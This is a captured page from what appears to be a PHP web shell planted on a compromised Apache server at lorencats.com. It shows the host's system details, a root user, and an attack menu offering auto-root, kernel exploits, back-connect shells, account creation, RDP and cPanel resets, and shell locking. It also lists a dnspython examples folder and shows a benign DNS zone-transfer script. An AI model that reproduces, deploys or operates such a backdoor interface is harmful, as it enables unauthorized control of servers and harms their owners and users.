Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.130
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
doc /
python-dnspython /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
ddns.py
1.18
KB
-rwxr-xr-x
e164.py
152
B
-rwxr-xr-x
mx.py
225
B
-rwxr-xr-x
name.py
468
B
-rwxr-xr-x
query_specific.py
851
B
-rw-r--r--
receive_notify.py
967
B
-rw-r--r--
reverse.py
1.42
KB
-rwxr-xr-x
reverse_name.py
177
B
-rwxr-xr-x
xfr.py
374
B
-rwxr-xr-x
zonediff.py.gz
3.06
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : xfr.py
#!/usr/bin/env python from __future__ import print_function import dns.query import dns.resolver import dns.zone soa_answer = dns.resolver.query('dnspython.org', 'SOA') master_answer = dns.resolver.query(soa_answer[0].mname, 'A') z = dns.zone.from_xfr(dns.query.xfr(master_answer[0].address, 'dnspython.org')) for n in sorted(z.nodes.keys()): print(z[n].to_text(n))
Close